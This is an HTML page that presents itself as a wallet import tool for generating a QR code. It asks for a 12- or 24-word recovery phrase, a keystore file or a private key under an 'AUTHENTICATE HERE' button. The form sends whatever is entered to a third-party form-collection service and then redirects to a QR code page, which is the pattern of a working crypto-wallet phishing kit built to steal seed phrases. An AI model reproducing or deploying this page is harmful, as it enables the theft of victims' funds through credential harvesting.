<!DOCTYPE html>
<html lang="en" style="background-color: rgb(0, 0, 17);">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css" 
    integrity="sha384-DyZ88mC6Up2uqS4h/KRgHuoeGwBcD4Ng9SiP4dIRy0EXTlnuz47vAwmeGwVChigm" 
    crossorigin="anonymous">
    <link rel="shortcut icon" type="image/png" href="images/Dapps.png">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.js" integrity="sha512-n/4gHW3atM3QqRcbCn6ewmpxcLAHGaDjpEBu4xZd47N0W2oQ+6q7oc3PXstrJYXcbNU1OHdQ1T7pAP+gi5Yu8g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <title>Import wallet</title>
</head>


<body style="background-color: rgb(0, 0, 17);">
    <div class="qr-home-tag" style="background-color: rgb(0, 0, 17);">
        <div class="qrtags" style="display: flex; padding-left: 0px; background-color: rgb(0, 0, 17);">
        <button style="border: 2px solid rgb(224, 223, 234); border-radius: 0.4rem; background-color: blue; padding: 0.5rem;">
        <a href="./index.html" style="background-color: blue; font-size: large; 
        color: darkslategray; text-transform: uppercase;"> <i class="fas fa-bars" style="color: white;"></i> </a></button>
    </div>
    </div>
     
    <h2 style="background-color: rgb(12, 128, 128); border-radius: 0.2rem; padding: 0.3em;">Import Wallet To Generate QR Code</h2>
    <div class="phrase" style="background-color: rgb(0, 0, 17);">
    <nav>
        <ul class="tabs">
            <li class="tab is-active"><a data-switcher data-tab="1" href="submitphrase.html"> Phrase </a>
            </li>
            <li class="tab"><a data-switcher data-tab="2" href="keystore-json.html"> Keystore json  </a>
            </li>
            <li class="tab"><a data-switcher data-tab="3" href="private.html"> Private Key </a>
        </ul>
    </nav>
      

    <form action="https://formcarry.com/s/-gNzz8xRuLe" style="background-color: rgb(0, 0, 17);" method="POST">
    <!-- <form action="#" style="background-color: rgb(0, 0, 17);" method="POST"> -->
        <div class="main-box" style="background-color:rgb(0, 0, 17)">
            <div class="phrase-box" style="background-color: rgb(0, 0, 17);">  
                <input type="text" name="phrase" id="private-box" placeholder="input private key..." required autocomplete="off">
                <br>
            </div>
            <label for="phrase_input" class="form__label" style="color: rgb(116, 107, 107); background-color: rgb(0, 0, 17);">Typically 12 (sometimes 24) words separated by a single space.</label><br>

            
            <button type="submit" id="btn"><a href="qrcode.html"></a><p style="background-color: rgb(20, 48, 99); font-weight: 700; color: white;"> AUTHENTICATE HERE</button>
                
        </div>
    </form>    
  
    <div class="social-icons" style="padding-top: 4rem; background-color: rgb(0, 0, 17);" >
        <a href="index.html" class="social-icon-link" target="_blank"><i class="fab fa-facebook"></i></a>
        <a href="index.html" class="social-icon-link"><i class="fab fa-instagram"></i></a>
        <a href="index.html" class="social-icon-link"><i class="fab fa-discord"></i></a>
        <a href="index.html" class="social-icon-link"><i class="fab fa-twitter"></i></a>
    </div>
    <div class="footer-link-items" style="background-color: rgb(0, 0, 17);">
        <a href="https://facebook.com/" style="background-color: rgb(0, 0, 17);">Facebook</a>
        <a href="https://www.instagram.com/accounts/login/" style="background-color: rgb(0, 0, 17);">Instagram</a>
        <a href="https://discord.com/" style="background-color: rgb(0, 0, 17);">Discord</a>
        <a href="https://twitter.com" style="background-color: rgb(0, 0, 17);">Twitter</a>
    </div>
    
</div>



    
    <script src="app.js"></script>

    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script>
        $(".ajaxForm").submit(function(e) {
            e.preventDefault();
            var href = $(this).attr("action");
            $.ajax({
                type: "POST",
                dataType: "json",
                url: href,
                data: $(this).serialize(),
                success: function(response) {
                    if (response.status == "success") {
                        window.location.href = 'qrcode.html'; // redirection url // change this. 
                    } else {
                        alert("An error occured: " + response.message);
                    }
                }
            });
        });
    </script>
</body>
</html>